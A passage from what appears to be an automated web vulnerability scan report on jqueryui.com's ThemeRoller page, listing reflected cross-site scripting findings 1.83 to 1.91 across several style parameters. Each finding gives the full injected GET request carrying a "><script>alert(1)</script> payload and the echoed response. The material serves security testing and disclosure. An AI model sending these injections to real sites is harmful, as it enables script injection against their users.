conColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.83. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7403f"><script>alert(1)</script>521994f8e38 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.84. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fc"><script>alert(1)</script>8a9102a62ac was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

1.85. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989c9"><script>alert(1)</script>521a1604b00 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

1.86. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa52a"><script>alert(1)</script>8067e0305a5 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

1.87. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45300"><script>alert(1)</script>52b8cc61183 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.88. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a47"><script>alert(1)</script>60d08e980b0 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

1.89. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f63f"><script>alert(1)</script>163cc6d3cf8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

1.90. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72395"><script>alert(1)</script>c2b2e0d945c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

1.91. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b6c8"><script>alert(1)</script>794ffc806f6 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
